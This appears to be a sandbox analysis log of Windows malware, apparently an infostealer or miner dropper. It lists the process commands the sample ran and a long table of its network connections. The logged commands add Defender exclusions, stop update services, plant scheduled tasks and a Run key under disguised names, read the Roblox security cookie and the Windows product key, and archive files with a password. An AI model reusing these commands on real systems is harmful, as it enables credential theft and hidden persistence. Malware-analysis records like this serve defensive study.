aQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwwyf4i\2gwwyf4i.cmdline"
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA3.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwwyf4i\CSC229DC49CB57442979C28C285F64D8449.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp118A.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 2868"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\unsecapp.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ire5zvi\5ire5zvi.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E2D.tmp" "c:\ProgramData\CSCF43CE2E5258F4DD697D053FEDB47933.TMP"
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4r3duunw\4r3duunw.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20DC.tmp" "c:\Windows\System32\CSC1A7D769C659B400EA85FDABAD4AD8D84.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfo" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "systeminfos" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\crss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Branding\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ko8RUfNOJ1.bat"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI28802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\LrRRW.zip" *
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe
"C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| IS | 193.4.123.159:80 | tcp | |
| CN | 114.83.198.181:80 | tcp | |
| US | 26.68.171.69:80 | tcp | |
| N/A | 10.178.84.20:80 | tcp | |
| US | 75.227.189.169:80 | tcp | |
| RU | 109.236.254.253:80 | tcp | |
| US | 20.136.248.43:80 | tcp | |
| IN | 45.82.40.13:80 | tcp | |
| US | 7.89.203.174:80 | tcp | |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| CA | 167.46.84.79:80 | tcp | |
| IT | 151.85.189.101:80 | tcp | |
| US | 50.214.29.5:80 | tcp | |
| BR | 189.66.12.105:80 | tcp | |
| US | 12.25.72.122:80 | tcp | |
| CN | 112.32.47.194:80 | tcp | |
| CN | 49.87.5.86:80 | tcp | |
| N/A | 10.64.2.169:80 | tcp | |
| NL | 5.157.91.10:80 | tcp | |
| US | 33.153.179.187:80 | tcp | |
| US | 71.90.246.141:80 | tcp | |
| JP | 130.54.143.252:80 | tcp | |
| AL | 46.99.227.32:80 | tcp | |
| CN | 61.153.112.49:80 | tcp | |
| US | 35.65.111.237:80 | tcp | |
| TW | 220.143.247.143:80 | tcp | |
| JP | 157.111.137.244:80 | tcp | |
| IT | 93.37.232.90:80 | tcp | |
| TW | 211.72.127.199:80 | tcp | |
| US | 55.78.250.12:80 | tcp | |
| GB | 194.128.249.46:80 | tcp | |
| US | 34.111.185.162:80 | tcp | |
| CN | 61.160.44.255:80 | tcp | |
| US | 34.111.185.162:80 | 34.111.185.162 | tcp |
| US | 9.8.16.163:80 | tcp | |
| DE | 53.231.191.71:80 | tcp | |
| UA | 5.58.82.109:80 | tcp | |
| MX | 200.0.109.48:80 | tcp | |
| US | 13.46.224.211:80 | tcp | |
| MY | 118.101.43.166:80 | tcp | |
| GB | 25.92.190.143:80 | tcp | |
| US | 174.253.164.59:80 | tcp | |
| SD | 102.124.20.121:80 | tcp | |
| IN | 161.118.31.62:80 | tcp | |
| US | 47.188.48.2:80 | tcp | |
| US | 8.8.8.8:53 | 162.185.111.34.in-addr.arpa | udp |
| KR | 124.46.42.246:80 | tcp | |
| FR | 92.91.233.152:80 | tcp | |
| US | 199.180.15.180:80 | tcp | |
| US | 12.199.16.114:80 | tcp | |
| JP | 122.223.11.203:80 | tcp | |
| KR | 49.62.19.194:80 | tcp | |
| TH | 171.103.154.199:80 | tcp | |
| US | 184.212.9.135:80 | tcp | |
| CN | 123.166.238.144:80 | tcp | |
| CA | 24.36.83.150:80 | tcp | |
| US | 18.28.114.89:80 | tcp | |
| TH | 171.103.154.199:80 | 171.103.154.199 | tcp |
| US | 30.221.132.104:80 | tcp | |
| US | 11.188.62.72:80 | tcp | |
| AU | 152.147.126.17:80 | tcp | |
| RS | 178.221.120.64:80 | tcp | |
| US | 96.152.90.40:80 | tcp | |
| US | 209.92.232.113:80 | tcp | |
| US | 8.8.8.8:53 | 199.154.103.171.in-addr.arpa | udp |
| GB | 82.37.11.145:80 | tcp | |
| CH | 152.96.94.210:80 | tcp | |
| US | 71.230.107.38:80 | tcp | |
| TH | 171.103.154.199:443 | tcp | |
| BH | 56.186.94.188:80 | tcp | |
| CN | 110.72.210.51:80 | tcp | |
| GB | 81.132.46.9:80 | tcp | |
| US | 28.242.151.63:80 | tcp | |
| US | 69.83.2.13:80 | tcp | |
| US | 207.70.150.221:80 | tcp | |
| US | 54.49.101.11:80 | tcp | |
| US | 68.158.48.214:80 | tcp | |
| US | 167.88.193.199:80 | tcp | |
| NL | 195.33.33.101:80 | tcp | |
| CN | 183.204.110.147:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 167.88.193.199:80 | 167.88.193.199 | tcp |
| CN | 39.181.48.145:80 | tcp | |
| HR | 78.134.213.195:80 | tcp | |
| SG | 162.125.81.54:80 | tcp | |
| US | 15.140.8.94:80 | tcp | |
| US | 209.122.98.90:80 | tcp | |
| DE | 53.188.72.182:80 | tcp | |
| US | 22.112.106.244:80 | tcp | |
| JP | 175.128.135.93:80 | tcp | |
| US | 167.88.193.199:443 | tcp | |
| DK | 87.73.171.73:80 | tcp | |
| ZA | 197.65.97.31:80 | tcp | |
| HU | 193.225.48.33:80 | tcp | |
| NL | 195.240.116.207:80 | tcp | |
| US | 214.29.25.9:80 | tcp | |
| NL | 20.50.93.175:80 | tcp | |
| CN | 210.21.44.153:80 | tcp | |
| US | 135.145.195.144:80 | tcp | |
| US | 8.8.8.8:53 | 199.193.88.167.in-addr.arpa | udp |
| EG | 196.221.99.168:80 | tcp | |
| JP | 61.196.215.88:80 | tcp | |
| US | 4.12.142.104:80 | tcp | |
| US | 104.56.69.173:80 | tcp | |
| US | 198.193.205.83:80 | tcp | |
| US | 71.166.133.211:80 | tcp | |
| US | 29.114.251.157:80 | tcp | |
| KR | 125.128.29.167:80 | tcp | |
| NL | 195.33.93.28:80 | tcp | |
| SE | 192.71.19.215:80 | tcp | |
| ID | 182.2.248.210:80 | tcp | |
| US | 18.119.188.233:80 | tcp | |
| CN | 110.199.107.113:80 | tcp | |
| PT | 85.240.247.8:80 | tcp | |
| US | 6.50.117.173:80 | tcp | |
| CH | 169.52.6.202:80 | tcp | |
| US | 69.48.183.4:80 | tcp | |
| MA | 196.83.109.53:80 | tcp | |
| TW | 223.141.192.7:80 | tcp | |
| KR | 150.197.128.108:80 | tcp | |
| ZA | 197.228.13.182:80 | tcp | |
| US | 47.22.74.155:80 | tcp | |
| US | 6.100.152.219:80 | tcp | |
| NL | 217.102.6.58:80 | tcp | |
| TW | 120.96.154.50:80 | tcp | |
| US | 63.70.114.71:80 | tcp | |
| UA | 91.234.79.44:80 | tcp | |
| FR | 86.224.242.205:80 | tcp | |
| CN | 101.92.113.154:80 | tcp | |
| US | 213.176.42.75:80 | tcp | |
| NL | 62.185.167.214:80 | tcp | |
| GB | 89.242.99.45:80 | tcp | |
| US | 213.176.42.75:80 | 213.176.42.75 | tcp |
| US | 55.144.97.196:80 | tcp | |
| JP | 111.104.154.139:80 | tcp | |
| US | 152.163.34.16:80 | tcp | |
| BR | 200.188.220.159:80 | tcp | |
| CN | 218.97.226.169:80 | tcp | |
| MX | 189.147.141.69:80 | tcp | |
| US | 44.96.197.193:80 | tcp | |
| CN | 47.103.75.124:80 | tcp | |
| CN | 124.112.231.170:80 | tcp | |
| US | 135.160.161.150:80 | tcp | |
| IT | 95.229.81.75:80 | tcp | |
| DE | 193.103.19.131:80 | tcp | |
| UA | 176.38.214.90:80 | tcp | |
| CN | 125.105.9.42:80 | tcp | |
| US | 65.129.38.160:80 | tcp | |
| US | 192.27.34.100:80 | tcp | |
| VN | 117.7.9.216:80 | tcp | |
| SE | 217.67.88.255:80 | tcp | |
| US | 68.179.210.88:80 | tcp | |
| CN | 49.64.36.73:80 | tcp | |
| US | 8.8.8.8:53 | 75.42.176.213.in-addr.arpa | udp |
| BR | 177.31.96.9:80 | tcp | |
| US | 99.127.88.85:80 | tcp | |
| US | 55.170.103.185:80 | tcp | |
| IR | 188.159.45.69:80 | tcp | |
| US | 6.74.119.194:80 | tcp | |
| US | 165.156.30.211:80 | tcp | |
| JP | 133.67.69.45:80 | tcp | |
| US | 160.128.9.44:80 | tcp | |
| JP | 180.42.69.88:80 | tcp | |
| US | 7.140.204.146:80 | tcp | |
| FR | 163.115.45.26:80 | tcp | |
| BR | 191.61.115.131:80 | tcp | |
| DE | 51.75.90.208:80 | tcp | |
| US | 143.200.106.32:80 | tcp | |
| US | 204.51.240.12:80 | tcp | |
| UA | 109.86.252.157:80 | tcp | |
| DE | 51.75.90.208:80 | 51.75.90.208 | tcp |
| GE | 188.169.78.185:80 | tcp | |
| BR | 191.61.115.131:80 | 191.61.115.131 | tcp |
| US | 47.160.21.172:80 | tcp | |
| US | 8.8.8.8:53 | 208.90.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.115.61.191.in-addr.arpa | udp |
| US | 158.76.97.154:80 | tcp | |
| US | 65.14.224.183:80 | tcp | |
| NZ | 125.236.90.127:80 | tcp | |
| US | 155.164.75.245:80 | tcp | |
| EG | 156.182.16.233:80 | tcp | |
| US | 73.252.173.19:80 | tcp | |
| US | 140.74.69.140:80 | tcp | |
| CA | 99.236.11.74:80 | tcp | |
| US | 135.244.38.247:80 | tcp | |
| US | 96.37.235.138:80 | tcp | |
| N/A | 100.124.230.211:80 | tcp | |
| SG | 43.51.9.25:80 | tcp | |
| SG | 61.16.105.236:80 | tcp | |
| UA | 195.178.149.181:80 | tcp | |
| CN | 123.92.69.215:80 | tcp | |
| CN | 8.141.164.130:80 | tcp | |
| KR | 166.104.123.159:80 | tcp | |
| N/A | 10.9.92.229:80 | tcp | |
| US | 164.153.92.83:80 | tcp | |
| CN | 117.79.178.82:80 | tcp | |
| KR | 166.104.123.159:80 | tcp | |
| PT | 79.168.110.61:80 | tcp | |
| AU | 115.64.156.12:80 | tcp | |
| US | 143.187.233.105:80 | tcp | |
| VE | 190.37.106.123:80 | tcp | |
| US | 161.206.255.170:80 | tcp | |
| US | 21.250.132.57:80 | tcp | |
| JP | 157.63.211.144:80 | tcp | |
| CN | 121.194.147.188:80 | tcp | |
| CN | 36.112.181.44:80 | tcp | |
| US | 21.52.20.144:80 | tcp | |
| US | 16.61.160.65:80 | tcp | |
| US | 8.8.8.8:53 | 159.123.104.166.in-addr.arpa | udp |
| JP | 194.53.191.205:80 | tcp | |
| JP | 126.199.119.145:80 | tcp | |
| US | 107.3.126.39:80 | tcp | |
| JP | 114.168.240.79:80 | tcp | |
| AR | 181.23.27.247:80 | tcp | |
| IT | 79.42.218.151:80 | tcp | |
| BR | 201.25.94.164:80 | tcp | |
| BR | 179.64.9.195:80 | tcp | |
| GB | 86.181.106.132:80 | tcp | |
| FR | 15.237.240.70:80 | tcp | |
| US | 30.124.40.110:80 | tcp | |
| TN | 196.227.117.85:80 | tcp | |
| KR | 39.20.61.163:80 | tcp | |
| IE | 56.52.195.8:80 | tcp | |
| US | 172.89.234.204:80 | tcp | |
| US | 152.70.156.238:80 | tcp | |
| US | 205.115.248.170:80 | tcp | |
| FR | 139.124.124.124:80 | tcp | |
| US | 206.164.23.40:80 | tcp | |
| AU | 147.41.240.134:80 | tcp | |
| KR | 203.225.34.134:80 | tcp | |
| DE | 141.45.17.44:80 | tcp | |
| CH | 91.108.184.72:80 | tcp | |
| CN | 36.115.197.90:80 | tcp | |
| US | 76.181.139.195:80 | tcp | |
| CN | 222.94.28.83:80 | tcp | |
| US | 131.53.105.120:80 | tcp | |
| CN | 129.204.41.4:80 | tcp | |
| CN | 58.253.67.48:80 | tcp | |
| US | 140.64.241.182:80 | tcp | |
| RO | 5.83.45.64:80 | tcp | |
| CN | 59.75.239.24:80 | tcp | |
| RO | 5.83.45.64:80 | 5.83.45.64 | tcp |
| US | 50.37.140.98:80 | tcp | |
| CN | 218.106.232.13:80 | tcp | |
| US | 215.2.57.172:80 | tcp | |
| US | 143.181.174.29:80 | tcp | |
| US | 73.78.137.86:80 | tcp | |
| NL | 194.45.86.116:80 | tcp | |
| JP | 153.183.221.240:80 | tcp | |
| EG | 154.190.184.70:80 | tcp | |
| MG | 154.126.96.13:80 | tcp | |
| US | 48.201.108.119:80 | tcp | |
| US | 71.157.136.149:80 | tcp | |
| BR | 201.59.136.45:80 | tcp | |
| GA | 41.158.242.199:80 | tcp | |
| EG | 105.199.99.3:80 | tcp | |
| SG | 27.111.144.122:80 | tcp | |
| RU | 5.35.106.55:80 | tcp | |
| US | 38.184.29.43:80 | tcp | |
| CH | 178.82.226.111:80 | tcp | |
| CN | 121.197.161.164:80 | tcp | |
| US | 8.8.8.8:53 | 64.45.83.5.in-addr.arpa | udp |
| DE | 213.20.197.251:80 | tcp | |
| US | 99.145.132.126:80 | tcp | |
| JP | 150.71.102.58:80 | tcp | |
| ZA | 165.149.137.83:80 | tcp | |
| KR | 60.196.148.195:80 | tcp | |
| DE | 213.68.157.249:80 | tcp | |
| CN | 43.195.162.212:80 | tcp | |
| DE | 79.236.199.85:80 | tcp | |
| US | 146.57.77.226:80 | tcp | |
| CN | 115.170.123.233:80 | tcp | |
| JP | 125.199.25.48:80 | tcp | |
| IR | 5.112.144.16:80 | tcp | |
| FI | 164.13.70.49:80 | tcp | |
| JP | 121.82.210.82:80 | tcp | |
| DE | 87.155.231.215:80 | tcp | |
| IE | 143.239.68.194:80 | tcp | |
| JP | 133.55.51.90:80 | tcp | |
| CH | 178.195.86.121:80 | tcp | |
| US | 72.47.40.32:80 | tcp | |
| GB | 86.134.115.165:80 | tcp | |
| US | 4.32.191.168:80 | tcp | |
| KR | 223.46.225.164:80 | tcp | |
| US | 135.202.34.203:80 | tcp | |
| US | 6.78.93.110:80 | tcp | |
| US | 28.197.56.47:80 | tcp | |
| US | 35.93.240.43:80 | tcp | |
| US | 57.170.49.53:80 | tcp | |
| US | 161.47.169.84:80 | tcp | |
| US | 51.10.210.163:80 | tcp | |
| US | 76.47.14.252:80 | tcp | |
| US | 98.195.147.215:80 | tcp | |
| US | 158.145.20.66:80 | tcp | |
| IL | 2.54.26.88:80 | tcp | |
| CN | 110.59.205.92:80 | tcp | |
| RU | 109.184.199.50:80 | tcp | |
| BR | 200.147.221.160:80 | tcp | |
| FR | 37.167.149.237:80 | tcp | |
| US | 204.177.97.68:80 | tcp | |
| US | 56.62.144.59:80 | tcp | |
| US | 71.126.5.143:80 | tcp | |
| BR | 189.120.88.104:80 | tcp | |
| IR | 62.60.175.134:80 | tcp | |
| US | 6.202.94.136:80 | tcp | |
| US | 99.0.18.234:80 | tcp | |
| JP | 126.190.234.101:80 | tcp | |
| US | 156.66.102.246:80 | tcp | |
| US | 29.255.148.127:80 | tcp | |
| CN | 61.135.246.236:80 | tcp | |
| US | 73.35.186.119:80 | tcp | |
| US | 16.135.244.96:80 | tcp | |
| US | 50.178.70.212:80 | tcp | |
| NL | 161.88.168.63:80 | tcp | |
| US | 136.63.240.187:80 | tcp | |
| CN | 119.2.202.83:80 | tcp | |
| CO | 179.15.184.210:80 | tcp | |
| RS | 46.240.148.200:80 | tcp | |
| US | 66.81.144.187:80 | tcp | |
| US | 205.205.200.162:80 | tcp | |
| US | 167.211.209.154:80 | tcp | |
| CL | 190.160.194.142:80 | tcp | |
| CN | 111.51.194.157:80 | tcp | |
| EG | 196.205.207.11:80 | tcp | |
| DE | 83.126.104.207:80 | tcp | |
| TW | 140.112.110.127:80 | tcp | |
| AE | 31.29.81.215:80 | tcp | |
| US | 68.16.57.96:80 | tcp | |
| TW | 111.248.69.16:80 | tcp | |
| SG | 156.249.45.76:80 | tcp | |
| BR | 177.68.89.7:80 | tcp | |
| GU | 114.142.209.86:80 | tcp | |
| FR | 185.252.237.166:80 | tcp | |
| US | 208.175.30.89:80 | tcp | |
| US | 173.18.15.143:80 | tcp | |
| US | 108.98.128.138:80 | tcp | |
| TW | 203.69.225.205:80 | tcp | |
| US | 96.18.228.167:80 | tcp | |
| KR | 61.101.184.72:80 | tcp | |
| US | 139.241.178.246:80 | tcp | |
| BY | 46.216.182.232:80 | tcp | |
| ZA | 13.244.147.173:80 | tcp | |
| US | 142.197.116.206:80 | tcp | |
